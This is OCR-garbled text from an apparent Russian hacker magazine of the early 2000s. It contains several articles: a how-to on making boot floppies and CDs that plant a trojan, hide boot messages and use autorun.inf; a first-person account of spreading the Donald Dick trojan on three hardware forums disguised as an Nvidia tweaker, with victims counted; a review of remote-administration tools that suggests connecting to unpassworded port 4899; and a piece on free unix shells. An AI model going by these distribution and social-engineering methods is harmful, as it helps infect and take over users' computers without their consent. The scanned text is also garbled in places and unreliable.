«Программа получила управление под запущенной виндой». 
Под Windows получить управление можно большим количеством спосо- 
бов, но так как винда еще не загружена, то у нас нет доступа к реестру, у 
нас есть доступ только к файловой системе. Остается два способа - про- 
писать себя в 5апир-директорию или заменить какой-нибудь существу- 
ющий ехе-шник, который точно получает управление (идеальные канди- 
датуры Internet Explorer, Notepad, Word, Outlook). 

Подводим итоги - мы должны сделать обычную системную дискету 
Windows-a, выкинуть из нее все лишнее. Записать на дискетку нашу про- 
грамму (с пропиской запуска в autoexec.bat), которая при запуске скани- 
рует винчестер и прописывает себя (или другую программу) в Startup-an- 
ректории, а также, опциально, переписывает Explorer, Word, Notepad ит.д. 


ПРЯЧЕМ 


Для маскировки загрузки с дискеты желательно затереть все надписи, ко- 
торыми обычно сопровождается загрузка с дискеты, чтобы юзер был по- 
дольше в неведении. Для этого надо в файлах io.sys, msdos.sys затереть 
все сообщения нулевыми символами (открываешь эти файлы в любом 
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Давным-давно, когда программы еще были маленькими 
дискеты - большими, а винчестеров почти совсем не было, 
вирусы часто распространялись через загрузочные записи 
дискет. Такие вирусы называют бУтовыми. Сейчас мы 
вспомним старое и тоже замутим бутового, но уже не вируса, 
а трояна. 


Вех-редакторе, ищешь все, что похоже на осмысленные строки, и зафига- 
чиваешь на их место нули). Для того чтобы программа не отсвечивала на 
диске, можно основную часть (которая занимается переписью на винт) 
переименовать в Command.com, а хвост (программа, которая будет пере- 
писана на винт) спрятать в Ба-секторах, lost cluster-ax дискеты (или без 
гимора заренеймить в какой-нибудь bootcat.bin или aspi4dos.sys :)). По- 
сле того как деструктивные действия выполнены (программа переписана 
на винт), можно вывести стандартное сообщение «Insert system disk», 
чтобы опять же юзер ничего не заметил. 


ПРОДВИГАЕМ 


Самое интересное, что все, что я сейчас говорил про дискеты, так же спра- 
ведливо и для загрузочных с4-дисков. У загрузочного с4-юка есть неви- 
димый специальный файл - образ дискеты, который при загрузке с cd- 
диска и получает управление. 

Так что по-быстрому делаешь загрузочную дискету (причем можно не 
особо заморачиваться с маскировкой, так как на с4-юке все равно нельзя 
обычными средствами посмотреть, что было в образе дискетки), записы- 
ваешь загрузочный с4-диск с образом только что сделанной дискетки и 
раздаешь народу в качестве халявы; рано или поздно юзер забудет сидюк 
в дисководе, и все! Твой троян получил управление. 


Раз уж зашла речь о СО-дисках, то сразу вспоминается такая фича, как 
Autorun. Windows обычно при вставке диска запускает программу, кото- 
рая прописана на сидюке для автозапуска. Autorun делается не просто, а 
очень просто. Создаем ехе-шник и записываем на сидюк, далее в корень 
диска записываем файл «autorun.inf» из двух строчек. 


[autorun] 
ореп=<путь к ехе-шнику> 


Где <путь к ехе-шнику> - это полный путь (но без буквы диска) к програм- 
ме, которую надо запустить. Например, MyDir\MyCoolProgram.exe или 
MyTroan.exe. Если необходимо, то программе можно передать и парамет- 
ры - "МуРгодгат.ехе КШАШ. По большому счету, файл не обязан быть ехе- 
шником, это может быть файл с любым расширением, известным Windows- 
у. Если ты фанатеешь от макровирусов, то вместо ехе-шника можешь сме- 
ло прописывать на запуск 4ос-файл с макровирусом ;). 

Но давай маленько поговорим за психологию. Для того чтобы юзверь не на- 
прягся при вставке и запуске твоего диска, надо этот самый запуск как-ни- 
будь замаскировать. Для этого можно использовать два подхода. При пер- 
вом подходе программа переименовывается во что-нибудь безобидное 
(например, setup.exe), а при старте быстро и без всяких окон прописывает 
себя в Windows, надеясь, что пользователь ничего не заметит. При втором 
подходе троян оформляется, например, в виде программы-меню, которая 
предлагает юзеру посмотреть, что есть на диске, полистать картинки, послу- 
шать музыку ит.д., а сама в это время на заднем фоне заражает компьютер. 
Троянов лучше писать самим, а не пользоваться готовыми, так меньше веро- 
ятность, что антивири что-то унюхают. Чужой троян (хотя и свой тоже) сто- 
ит проверить последним антивирусом (а лучше несколькими различными). 
Иначе может получиться нехорошо, чел, с которым ты поделился диском, 
при следующей встрече может и по ушам надавать... 

Для любопытных юзеров можно по диску раскидать программки с инте- 
ресными названиями, а при запуске или имитировать бурную деятель- 
ность, или выдавать сообщение об ошибке, а на заднем фоне опять же бы- 
стренько переписываться на винт. 

Ладно, я пошел готовить новую партию халявных дисков, чего и тебе 


желаю. 


=== 
= 
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распространяем полезный софт 


Хрым7 (hrimz@xyligan.ru) 


Тебя я огорчать не собираюсь, а лишь хочу показать, как все-таки можно 
заставить ламера ушастого скачать и запустить (добровольно) наследни- 
ка Трои в наше нелегкое время. Как и в любом расследовании, у нас не 
обошлось без жертв :-). Сразу хочу извиниться перед форумами, винтами 
юзеров, самими юзерами, да и вообще всеми, кто был задействован в этом 
сатанинском эксперименте. Человек сорок наберется :-). 


ЧТО ДА КАК? 


Итак, что же собой представляло расследование? Во-первых, все деструк- 
тивные действия я проводил через прокси-серверы, список которых лю- 
безно предоставили www.mazafaka.ru. Далее. Зарегил мыло 
orange@nc.ru, выбрав в качестве ника нашего 71о-хацкера этот самый 
огапде. Инфа при регистрации была взята, естественно, из головы. 

Теперь сам сценарий. Бравый перец огапде нашел где-то на просторах се- 
ти славную прогу-твикер видеокарточек от фирмы Nvidia. Естественно, 
этот славный твикер оказался просто чудодейственным, так как сам все 
делал, мало весил, вообще не бажил и даже на старых картах заставлял 
современные игрухи просто летать :-). Грех было бы не поделиться с ос- 
тальным населением рунета линком на эту чудо-программу. Но вот беда, 
сайт, где огапде слил твикер, уже загнулся, и тогда он принял ответствен- 
ное решение - зарегиться на бесплатном хостинге и выложить туда творе- 
ние программерской мысли. Вследствие чего был создан сайт 


арова! В этой статье мы проведем целое расследование. 

го основная цель - узнать, насколько реально сейчас 
впарить доверчивым пользователям коня. Не простым 
зех./рд..ехе, а чуть более интеллектуальным способом. 
Ведь в последнее время юзеры стали намного умнее, в 
разумных пределах, конечно, но все равно это несколько 
огорчает :). 


рис. Анатолий Бердюгин 
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Хацкерское мыло... 
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http://video_help.chat.ru и http://videohelp.boom.ru, а сам твикер 
можно было слить по адресу http://video_help.chat.ru/soft/nvidi- 
atweaker.zip и http://video_help.chat.ru/soft/Nvidiatweaker.exe. 


В качестве жертв были выбраны три крупных железнячных форума. В ка- 
честве ника на форуме пришлось юзать огапде-огапде, так на всех трех 
уже был зареген чел с таким именем. Апельсины все любят :). На каждом 
из этих форумов была создана новая тема «Самый лучший nVidia тви- 
кер!». В качестве оружия использовался известный в широких русских 
кругах Donald Dick версии 1.53. Сейчас девелоперы забросили свое тво- 
рение, но еще года полтора-два назад в «Хакере» можно было заценить 
интересное интервью с одним из разработчиков. Сейчас мистера О1ск`а 
поймает любой антивирь, но нам ведь сейчас не важно, что использовать 
в качестве оружия, нам главное - как. Фишек в этом творении столько, 
что просто закачаться можно. С машиной юзера можно делать все, что 
угодно. Хотя, признаюсь честно, было большое желание что-нибудь со- 
творить с захваченными машинами, но все-таки удержался. Нафига мне 
чужой Инет :). 


Для подсчета количества полных скачиваний трояна был установлен 
перл-скрипт (скриптик висел Ha dddfdgf.vov.ru - там perl есть), который 
был написан собственноручно. Все, что он делал, это считал, сколько на- 
рода слило наш файл, и предоставлял эту инфу в виде Нёт-документа. 
Ну а теперь сама мессага, которая постилась во всех бордах: 

«Перцы! Короче, предисловие такое. .. Я рыскал по сети в поисках каких- 
нибудь твикеров для карточек Nvidia. Просто поставил себе «Mafia», a 


Дурацкий хостинг, но нам сгодится 


ВПАРИВАНИЕ ТРОЯНОВ 


Г... | 


Один из лучших троянов. Когда-то был. 


Девелоперы давно забросили свое творение. 
А жаль... 


при 1024x768 и всех настройках тормозит прилично (у меня Geforce 2 MX 
64 мега). Ну вот, наткнулся на прогу nvidiatweaker на каком-то буржуй- 
ском сайте, скачал и ОФИГЕЛ! Это такое! Прога виндовая и весит 300 Кб. 
После запуска можно выбрать оптимальную частоту для КОНКРЕТНО тво- 
ей карты. То есть она дает тебе выбрать только из того, что точно будет ра- 
ботать без багов. Плюс она еще что-то оптимизирует, но эта инфа уже для 
спецов в этой области. Так вот. Этот сайт накрылся, и теперь там твикера 
нету, пробовал искать Ha filesearch.ru, тоже без результатов. 

Тогда решил создать на бесплатном хостинге сайт и выложить. Что и сде- 
лал. Вот линк: www.videohelp.boom.ru/soft/nvidiatweaker.exe. Под ХР na- 
wet... Удачи в юзании!». 

Я, конечно, знаю, что именно ты не повелся бы на такой дешевый прогон, 
но не все похожи на тебя :-). Вот о них теперь и поговорим. 


ПЕРВЫЙ ФОРУМ (WWW.FERRA.RU) 


Хороший форум, где можно получить ответ на «железный» вопрос, а так- 
же самому поделиться интересной инфой. Что хацкер огапде и сделал :). 
Но беда в том, что когда наш перл-счетчик высветил заветную единичку, 
на Orange@nc.ru упало два письма. В одном грозили зарезать за линк на 
троян. Дело в том, что у юзера был AVP, и нас запалили, а во втором один 
из админов форума сказал, что моя тема удалена из форума, что мой 1р- 
записан и занесен в черный список и пора мне валит оттуда куда подаль- 
ше. Я не стал нарываться и сделал, как просили. В итоге одного юзера на- 
тянули. Айпишник, между прочим, наш скрипт тоже записал. И (вот это 
да!) он оказался постоянным, то есть на другом конце, скорее всего, была 
выделенка. Ну, вывел я юзеру на экран мессагу «HACKED BY ORANGE!» и 
успокоился. 


Выводы из первой части примерно такие. Не стоит юзать очень популяр- 
ные форумы со строгими админами. Сначала надо присмотреться, что за 
народ там обитает, какие правила. Может быть, даже сначала провести 
разведку боем. Я имею ввиду написать что-то матерное и посмотреть, как 
среагируют :). В общем, от самого форума тоже очень многое зависит. Ес- 
ли ты запостишь не очень правдоподобную фигню на какой-нибудь ре- 
ально 31337 борде, то первый же чел, раскусивший тебя, поднимет такой 
шухер, что больше в Инет лучше вообще не выходить. Ты ведь видел, что 
на каждом кардерском форуме есть раздел «Кидалы». Например, сходи 
на www.carderplanet.com. Ты ведь не хочешь там оказаться? 


раде O41 


В продаже с 19 ноября 


We did it! С этого номера, амигос, Хакер 
стал еще хакерее прежнего: в увеличен- 
ном разделе Взлом читай о том, как не 
лохануться при трейдинге эксплойтами, 
что думает о дефейсах Крис Касперски, 
как получить shell нахаляву и кое-что 
еще. Не знаешь, какую видюху лучше 
подобрать к новогоднему гейм-сезону? 
Наша тестовая лаборатория имела секс 
с каждой из них! Результаты - в Ферруме. 
Ну аесли на крутое железо пока не хва- 
тает денег, почему бы тебе не продать- 
ся в порно бизнес? Как это сделать? 
Читай в свежем Х! 


- Как продаться в порно - Осваиваем профессию 
оператора порночата 

- Мобильный И-нет - В Сеть через мобильный: не 
так гиморно, как ты думаешь 

- Эксплоит в разрезе - Урони игровой сервер. 
Исходный код прилагается 

- Персональный ICQ брутфорс - Как самому 
написать убийственный брутфорс на Delphi и 
тырить ип'ы оптом 

- Linux против BSD - Какая же из этих "ипх- 
подобных" систем лучше и какой дистрибутив 
пингвина выбрать начинающему юниксоиду 

- Где нам стоит сайт пристроить - Все о выборе 
оптимального платного хостинга 

- Сертификация IT специалистов - Где и как ты 
сможешь получить официальный сертификат и во 
сколько тебе это обойдется 

- INSIDE: CD-ROM/R(W) - Раскурочим одноглазого 
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Хороший форум со строгим админом 


ВТОРОЙ ФОРУМ 


Вторым у нас в меню идет KB Hardware форум, ко- 
торый обитает по адресу www.kv.by/hardware/. 
Здесь тоже местные перцы не были настолько 
раскрепощены, чтобы качать непонятную прогу 
со стремного линка :). Было запостено целых 14 
сообщений, в которых развязался горячий спор 
на тему, чем лучше разгонять видеокарту, соот- 
ветственно восемь человек подставили свои ком- 
пьютерные задницы по Donald’ овский dick. По- 
сле чего было написано четыре гневных письма в 
адрес огапде`а с угрозой нюкнуть по самое не 
балуйся. И одно письмо, в котором чувак похва- 
лил затею и не стал обижаться на меня, так как 
обладал антивирусом. Общий смысл письма за- 


ключался в том, что тот тоже не прочь поразвле- 
каться таким мудреным способом и даже предло- 
жил немного Webmoney за 1р-адреса тех людей, 
что попались на крючок. Ну, здесь вывод просто 
сам напрашивается. Можно открывать новое те- 
чение в Trade-cyeHe. Теперь меняем не только 
креды, прокси-листы, аси, шеллы, но и 1р`шники 
затрояненных машин. Ведь наверняка найдется 
немало народу, который не прочь выдвинуть од- 
ноглазого у ламака. Но, опять же, не забывай о 
своей анонимности, так как получить по фейсу за 
все эти дела можно не только от других хацкеров, 
но и от правоохранительных органов. 

На этой не очень веселой ноте заканчивается 
второй этап расследования, и теперь тебя ожи- 
дает самое интересное. 


Здесь дела обстоят погорячее! 


Самый отцовский форум, да не в обиду другим 


ТРЕТИЙ ФОРУМ 


А теперь самое известное железное место в сети - величайший ixbt.com. 
Точнее сам форум ютится по адресу forum.ixbt.com. Здесь просто такое 
количество посетителей за день, что надо задуматься над скриптом, кото- 
рый уменьшает значение счетчика :). Каждый день тут появляется при- 
мерно по 20 новых тем, в каждой из которых постится до 60 сообщений. 
Нехило так? Вот и хакер Апельсин не прошел мимо этого приметного ме- 
стечка. Все было сделано по старой схеме. И вот уже через час после на- 
жатия кнопки «Отправить» в почтовый ящик легли три первые мессаги- 
уведомления о том, что кто-то соизволил ответить. 


Первое сообщение было от модератора и было немного наездного типа. 
Какого, мол, я фига использую слово «перцы» при обращении к читателям 
форума? А? Также была высказана вполне закономерная мысль насчет то- 
го, что Rivaluner рулит на видеотвикерской сцене. С чем я, в общем-то, со- 
гласен :). Разговоры разговорами, но даже хитрый модератор кликнул по 
заветной ссылочке и чуть не получил порцию хорошего настроения. 
Опять антивирус, видимо, спас. Далее другим мембером была высказана 
мысль, что у меня не все в порядке с психическим здоровьем. Интересно, 
откуда такие подозрения? Ума не приложу. 


Третий пользователь спросил, как, собственно, этот твикер будет обнов- 
ляться, ведь с появлением новых Detonator ов нужно обязательное обнов- 
ление. На это я решил не отвечать, так как не хотелось дискутировать по 
несуществующему вопросу. Если кто забыл, то нашего твикера в природе 
просто нет :). Еще через четыре часа пришли три новые мессаги с техниче- 
скими рассуждениями, что же все-таки твой твикер хренов не пашет. Я от- 
ветил, что руки у тебя кривые, у меня все работает отлично :). Так продол- 
жалось до середины следующего дня. И тут произошло невозможное. Ни- 
чего комментировать не буду, так как считаю, что не нуждается. 


Какая сегодня тематика дня? 


ВПАРИВАНИЕ ТРОЯНОВ 


Цитирую: 

«Спасибо за тулзу. У меня теперь трабл с ГТАЗ практически нет. Надо бы 
найти разработчиков и написать им. Еще раз спасибо! А тем, кто пишет, 
что ничего не запускает и вообще это троян, следует присмотреться к 
файлу помощи (readme.txt)». 

Так, к сведению, никаких readme.txt я не выкладывал! Либо перец решил 
постебаться, либо травка что надо была :-). Следующие 36 часов прошли 
очень напряженно. Всего отписало 23 человека на форуме и пришло семь 
писем на мыло. Примерно половина несла разную пургу, другая сразу же 
палила и обвиняла в распространении вируса. В конце концов, модератор 
озверел (я его понимаю) и все снес к чертовой матери. Но все же. 17 юз- 
веров скачали О1сК`а, и 9 из них сидели на выделенке по-видимому без 
антивирусов. За что они могли жестоко поплатиться, благо это было про- 
сто расследование для журнала. 


Все. Это была последняя жертва надругательств, теперь осталось только 
МОЛИТЬСЯ, чтобы эти юзеры и админы не открыли номер на этой странице. 


КАК ЗАЩИТИТЬСЯ 


Это, конечно, все хорошо, что вот такое немалое количество народа ве- 
дется на попсоватую уловку, но ведь на месте жертв запросто можешь 
оказаться ты. Не отрицай, всегда в Инете найдется то, на что ты сразу по- 
ведешься и полетишь качать троянчик. В качестве защиты можно посове- 
товать антивирус, но для этого нужно иметь не очень слабую тачку, так 
как памяти жрет тот же АВП многовато. Да и обновлять его задолбаешься 
постоянно. Нет, конечно, у меня на домашней машине валяется Каспер- 
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Наши мессаги самые мессагнутые в мире! 


ский, но он запускается, только когда это действительно требуется. Глав- 
ной же защитой можно считать самого тебя. То есть перед тем, как что-то 
делать, нужно хорошо подумать, чтобы потом не плакать над звезданутым 
Инетом. Запомни! Ты самое слабое место в своей системе. Не качай ника- 
кого левого дерьма без проверки, тем более со всяких стремных 
super_hack_soft.chat.ru и так далее. На что тебе голова дана? Да что там 
бесплатные хостинги, это раньше так было, а сейчас для натягивания спе- 
циально тратят деньги (чужие :) на симпотный домен второго уровня, де- 
лают приличный дизайн, только бы ты туда побежал и сливал фекальки 
разные. В наше время в Интернете ничему нельзя верить - нужно все про- 
верять. 


ИТОГИ 


Подведем итоги расследования. По самому большому счету народ не из- 
менил своей психологии и не особо отличается в плане осторожности се- 
тевых сношений от самого себя года два-три назад. Правда, тут описывал- 
ся не самый банальный способ впаривания гадости, но все равно. 

Что ж, все закончилось, как примерно и ожидалось вначале. Народ ведет- 
ся, причем ведется активно так. Есть причины, почему это стоило бы по- 
пробовать :). Главное - не переусердствовать. Удачи тебе в нелегком деле 
легкого хака :)! 


=r 
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ПРОГРАТПТЫ 
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ADMUHUCTPUPOBAHUS 


помощники или трояны? 


Системное администрирование - нелегкий труд. Особенно 
если в сети много компов, несколько серверов и прочего 
сетевого оборудования, да еще все это хозяйство раскидано 
в пределах большого здания, а то и в нескольких корпусах. 


Работа админа по поддержанию такой системы в рабочем состоянии мог- 
ла бы стать сущим кошмаром, если бы умные люди не придумали програм- 
мы удаленного администрирования. Поставил на своей тачке клиента, а 
на рабочих станциях серверные части, и сиди в кресле, отвечая периоди- 
чески на телефонные звонки и устраняя софтовые проблемы на чужих 
компах, как на своем собственном. И не надо бегать по этажам и офисам 
ради того, чтобы показать какой-нибудь бухгалтерше или секретарше, где 
находится иконка, запускающая «Пасьянс». Другое дело, что многие ад- 
мины ставят серверные части и оставляют тем самым открытые порты на 
этих машинах, через которые может подключиться любой желающий, ес- 
ли ему известно, что за программа для удаленного администрирования 
используется в сети. А ведь не зря в таких прогах предусмотрена система 
пароля на серверную часть, но многие админы не хотят утруждать себя 
всякий раз набирать пароль, чтобы удаленно настроить любую из офис- 
ных машин. Иногда такие проги ставят и для управления серверами. По- 
лучается, что не надо никаких троянов - заботливые админы уже сами их 
для тебя установили. Осталось только выяснить, используется ли какая- 
либо система администрирования в интересующей тебя системе, что это 
за программа, найти клиентскую часть и войти. Никакого взлома - опять 
ловля на дурачка! Вот мы и решили тебе поведать о наиболее известных 
и часто используемых программах. И не надо кричать, что все про это зна- 
юти никто никогда это в своей сети не поставит. Поставят! Это я тебе го- 
ворю как админ, который повидал не одну сеть и знающий о глупостях 
других админов не понаслышке. 


REMOTE CONTROL 


Маленькая (ее дистрибутив занимает не более 1,5 M6!), но ужасно удоб- 
ная программка, которая позволит тебе работать с удаленным компьюте- 
ром, как со своим собственным. То есть ты будешь видеть то, что происхо- 


Ему достаточно будет всего 

лишь просканировать ее на 
наличие открытых портов, и если 
он знает, какая прога удаленного 
администрирования юзает такой 
порт, ему не составит труда достать 
такую же и подсоединиться 

к любой из машин 

своим клиентом. 
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Иещеу меня очень длинные руки... 


дит на экране удаленного компьютера, и полностью захватывать управле- 
ние. Программа состоит из клиента и сервера. Сервер называется RC 
Agent, а клиент - Long Hands (меткое название - действительно очень 
длинные руки!). Работает эта прога по протоколам TCP/IP и IPX/SPX че- 
рез 21544 порт. 

В процессе установки ты можешь выбрать, что требуется установить: толь- 
ко клиента, только сервер или же все сразу. Целесообразнее всего поста- 
вить сервер на те машины, которые ты собираешься админить, а на свою 
поставить только клиента. Серверная часть программы можно настроить 
на скрытую работу, то есть ее можно будет увидеть, если только нажать 
ctrl+alt+del и найти RCAgent.exe в списке процессов (ну, это только для 
МТ/2000/ХР - в 9хего не видать). На скрине ты можешь увидеть эту самую 


RCAgent и его настройки 


серверную часть и окно ее настроек. В целях безопасности можно задать 
пароль на серверную часть, чтобы никто другой не смог админить эту ма- 
шину удаленно. Но почему-то многие админы ленятся ставить пароль, 
пребывая в уверенности, что никто никогда не додумается ее заюзать. Я 
же рекомендую запаролить, если тебе не безразлична безопасность тво- 
ей сети. 

Клиент Long Hands работает следующим образом. Вначале можно вы- 
брать либо одну конкретную тачку, указав ее ТР-адрес (для TCP/IP) или 
МАС (для IPX/SPX), либо заставить прогу автоматически найти все компы 
в сети, на которых установлен RC Agent. Поиск занимает некоторое вре- 
мя, и в результате ты получишь список машин с ТР-адресами, МАС и име- 
нами, из которого только останется выбрать нужную тебе. Сразу же после 
того как ты выбрал машину, в главном окне программы ты увидишь то, что 
сейчас происходит на ее экране. Хотя все будет происходить с некоторы- 


ПРОГРАММЫ УДАЛЕННОГО АДМИНИСТРИРОВАНИЯ 


pcAnywhere - as is 
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ми тормозами (в зависимости от скорости соединения). Причем, в это 
время пользователь может ни о чем и не подозревать, особенно если на 
его машине RC Agent вообще скрыт. Нажав специальную кнопку на пане- 
ли инструментов, можно взять управление на себя, при этом клавиатура и 
мышь этого пользователя заблокируются, и ему останется только наблю- 
дать за твоими действиями. Можно посылать пользователю и послания - 
никогда не забуду лицо той сотрудницы, которая играла в «Пасьянс» и 
вдруг увидела мессагу типа «А ну-ка хватит играть - быстро за работу!». 
Больше она, кажется, никогда не играла в рабочее время, решив, видимо, 
что ее просекло начальство :). 

Взять эту прелесть можно тут: http://www.prolan.ru/solutions/down- 
load/remotecontrol/index.html. Ее, кстати, делают наши разработчики. К 
сожалению, прога шароварная и без регистрации позволяет админить 
только по 30 секунд на один сеанс. Но, я думаю, ты сам решишь, как тебе 
получить ее полную версию. 


PCANYWHERE 


Эта штука уже более навороченная. Да и BecuT ax 40 Мб. И возможностей 
у нее, соответственно, в несколько раз больше. Она поддерживает прото- 
колы TCP/IP, IPX/SPX, NetBIOS, а также может работать через сеть, Интер- 
нет, модем и даже через COM- и (РТ-порты. Еще эта программа позволяет 
напрямую обмениваться файлами - в нее встроен файловый менеджер. С 
сетью и Инетом все понятно - подсоединяйся и юзай - это как и в Remote 
Control. Что касается модема, так тут можно задать настройки для дозво- 
на - прога будет набирать номер, к которому подключен модем того ком- 


пьютера, который ты собираешься удаленно администрировать. То есть 
получается что-то типа BBC. С COM/LPT-noptamu все примерно так же - 
необходимо только подсоединиться с помощью кабеля напрямую. Тормо- 
за при этом зависят только от скорости соединения, но в общем скорость 
всегда остается вполне приемлемой. А уж по локалке, если она еще и не 
сильно загружена, ты будешь видеть другой компьютер в реальном време- 
ни, почти без задержек. 

Принцип работы примерно как и у Remote Control: ты видишь все, что 
происходит на экране удаленного компьютера, и можешь брать управле- 
ние на себя. pcAnywhere, в отличие от Remote Control, не получится пол- 
ностью скрыть, да и ее клиент и сервер неразделимы между собой. На 
каждую машину придется поставить по копии этой проги. Одну из них 
следует настроить как клиент, другую как сервер. То есть одна машина 
становится как бы хостом, а другие могут к ней подсоединяться. Прога ра- 
ботает через 5632 порт. Так же, как и в Remote Control, можно запаролить 
хост, чтобы предотвратить вторжение посторонних. 

Прогу делает известная контора Symantec, и взять ее можно, соответствен- 
но, на их сайте: www.symantec.com. Тоже шаровара, но это не страшно, тем 
более, что пираты часто кладут ее на диск вместе с Нортон Утилитами. 


RADMIN 


Пожалуй, этот продукт один из самых известных. Он ужасно прост и удо- 
бен. Я очень часто встречаю его в игровых клубах, Интернет-кафе ит.д. Да- 
же его шароварность не спасет его оттакой славы! Если продукт популярен, 
то и решений проблемы шароварности становится все больше и больше, 
сам знаешь, где можно найти лекарство. Еще один плюс - программа пол- 
ностью на русском и с русским Help’om. Но давай ближе ктелу, прога состо- 
ит из серверной части и клиентской (удивил =). Установи Radmin (послед- 
няя версия 2.1) на все тачки в сети (ты должен быть админом), при установ- 
ке можешь выбрать режим работы «как сервис», тогда он будет запускать- 
ся без твоей помощи, а можешь выбрать режим самостоятельного запуска, 
тогда после установки запусти радмин-сервер. С помощью программы наст- 
ройки радмин-сервера ты можешь поставить пароль на него (на сервер), я 
настоятельно советую это сделать. Если при установке ты по какой-то слу- 
чайности выбрал не тот способ загрузки, то там же можешь его поменять, а 
также ты можешь поменять порт, на котором висит радмин-сервер (по 
умолчанию 4899, если увидал у кого-то этот порт открытым, то попробуй 
приконнектиться клиентом, может там пароль забыли поставить =), на 
скрине ты можешь лицезреть остальные установки. 

Ну вот, все установки сделаны, и ты можешь спокойно идти на свое теп- 
лое админское место, запускай радмин-клиента и... И сам видишь, как 
все тут просто, создавай соединения со всеми компами в сети (нажми 
клавишу Insert), жми на какой-нить комп правой кнопкой мыши и выби- 
рай, че хочешь с ним сделать, например, вырубить, прителнетиться, полу- 
чить полный контроль, передать файлы. Даже человек с острова Ламос 
разберется с этой тулзой. Теперь о производительности, на сайте произ- 
водителя написано: «Даже если Вы подключены через МОДЕМ, Вы до- 
стигнете приличной скорости обновления (5-10 кадров в секунду). Если 
Вы используете ЛОКАЛЬНУЮ СЕТЬ, Вы достигнете реального времени об- 
новления (около 100-500 кадров в секунду)». И по всем тестам похоже, 
что они не лгут. ОЙ, чуть не забыл, скачать его можешь тут - Www.rad- 
пит. сот. 


| ee 


F OTE-ANYTHING 

В последнее время я стал встречать кучу про- 
грамм по имени RA, это и RAdmin, и 
RemotAnywhere, и Remote-Anything :), но среди 
этой тройки мне больше всего приглянулся 
Remote-Anything. Сейчас я опишу эту прогу, и, 
возможно, она понравится тебе так же, как и 
мне. 

Remote-Anything не уступает РАдмину ни в 
чем, даже в шароварности. Да-да, эта софтина 
не бесплатна. Купить/скачать можешь на оф. 
сайте - http://www.remote-anything.com. В 
архиве найдешь 4 запускных файла: Master, 
Slave, uninstall_slave, Player. С первыми тремя 
понятно, это клиент и сервер. А Player - это 
прога-проигрыватель КА-сессионых фильмов, 


честно говоря, я сам не понял, что это =), не 
будем заострять на этом екзешнике внимания 
и запустим Slave =). В трее (внизу справа) по- 
явится спасательный круг, щелкай по нему и 
выбирай Options. Там можешь выбрать порт, 
пароль и еще кучу всего, смотри скрин 1, боль- 
ше, чем в Radmin =)! Твой соколиный глаз уже, 
наверно, разглядел надпись «Send а SOS»... 
Хе-хе, это еще одна фича этой софтины, ты мо- 
жешь послать скрин рабочего стола кому-ни- 
будь или открыть чат с кем-нибудь из сети, на- 
пример, отрыть чат с админом и рассказать 
ему о своей трабле. 


Теперь давай поговорим о Master =), на скрине 2 
ты видишь его настройки. В проге имеется ад- 


ресная книжка, куда можно вносить адреса 
Slave-0B, есть возможность поиска доступных 
Slave-oB в сети, можно с ним початиться и полу- 
чить полный контроль =), пингануть, вырубить, в 
общем, остальное все, как у RAdmin. 


Вот и думай теперь сам, только ли ты можешь 
считать себя админом своей сети. Ведь если 
кто-то захочет напакостить твоей сети, ему до- 
статочно будет всего лишь просканировать ее 
на наличие открытых портов, и если он знает, 
какая прога удаленного администрирования 
юзает такой порт, ему не составит труда до- 
стать такую же и подсоединиться к любой из 
машин своим клиентом. И не надо засылать и 
впаривать Трояны - их уже и без тебя, считай, 
поставили, осталось только приконнектиться. 
И никакого взлома. Это при учете того, что 
многим админам слишком лень выставлять па- 
роли на каждую тачку или, в лучшем случае, 
назначать один и тот же пароль на все маши- 
ны. Некоторые чудаки (на букву «м») умудря- 
ются поставить такое даже на серверы, чтобы 
совсем со стула не вставать (так можно вообще 
появляться на работе, только если что-то круп- 
ное полетело). Имей это все в виду, особенно 
если ты сам админ и решил использовать в 
своей сети прогу удаленного администрирова- 
ния. Лучше не полениться и один раз все запа- 
ролить, и спать спокойно, чем потом схватить 
по шапке от начальства и от разъяренных ме- 
неджеров, секретарш и бухгалтеров, которые 
потеряли годовые отчеты, базу данных, резуль- 
таты своих побед в «Пасьянс» да еще и стали 
свидетелями, как на их глазах в их компы все- 
лился призрак и устроил полный дестрой. Ско- 
рее всего, на тебя все и свалят - кто тут у нас 
админ-то? 


ЛУЧШИЙ И ПОЛЕЗНЕЙШИЙ 
ЖУРНАЛ ОБО ВСЕМ 
МОБИЛЬНО-ЦИФРОВОМ 
И ЦИФРО-МОБИЛЬНОМ 


Тестируем HP iPaq 3970 - лучший 
из лучших КПК 

Узнаем, как реализован Wi-Fi на 
Toshiba E740 

Превращаем Pocket PC в 
карманный видеоплеер 

Комментируем второе пришествие 
Asus L3 

Знакомимся с ноутбуком 
MaxSelect 840 

Отвечаем Ha вопрос: "Растет ли 
стоимость мобильной связи?" 

Рассматриваем Alcatel One Touch 
715 Применяем камеру-записную 
книжку 

Logitech Pocket Digital Учим 
чистить объективы фотокамер 


По традиции в номере вы 
найдете основные новости КПК, 
ноутбуков, мобильных 
телефонов, цифровой 
фототехники, а также обзоры, 
тестирования и каталог 
наиболее интересных новинок. 


(бат) — 


ПРЕНРАСНОЕ 
DAMEHO 


poem удаленные unix shell’bi 


fenix (f3x@land.ru) 


Так что логичным будет следующий вопрос: где же взять этот UNIX шелл и 
поюзать его на халяву, так как большинство провайдеров предоставляют 
доступ к шеллу за вечнозеленые бабушки, что для тебя абсолютно непри- 
емлемо. Ты ведь хацкер, и не в твоей природе башлять за то, что можно 
взять самому, иногда даже без данного на то разрешения (но осторожно, 
ведь последствия, как сейчас модно говорить, могут быть ужасающе кри- 
тичными и необратимыми для твоего ценного хацкерского здоровья и ту- 
го набитого кошелька). 


Существует два возможных варианта: в первом ты инсталишь себе какой- 
либо юних и юзаешь его шелл, скорее всего - тебе влом это делать, так как 
ты наверняка очень занят в связи с ломкой очередного порносервака. Да 
и скорость он унаследует от твоего 14400-модема. Так что гораздо пред- 
почтительнее второй вариант: ты можешь, если захочешь, найти халявный 
шелл! Но как и где? 


Итак, к делу. Существует огромное множество серваков в нете, дающих 
доступ к шеллу на халяву. Один из них, с которым мы и поэксперименти- 
pyem, называется Cyberspace, обитающий по адресу www.cyberspace.org 
(полный список ты найдешь в конце статьи). 


Welcome to Сргек 
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Кстати, прошу заметить, на Данном серваке, кроме предоставления само- 
го шелла, мы можешь найти кучу доков по теме и софт ДЛЯ работы с шел- 
лом, всякого рода терминалы и клиенты. 


Единственное, что может стать тебе помехой (а может быть и нет, ты ведь 
кул хацкер) - так это буржуйское наречие (в простонародье English), на 
котором и сверстан этот сайт. 


В общем, кликаешь на ссылку Unix Shell Accounts (http://www.cyber- 
space.org/shell.html), после чего у тебя автоматически откроется окно 
терминала (telnet), и в случае удачного установления соединения в нем 
появится приглашение следующего вида: 


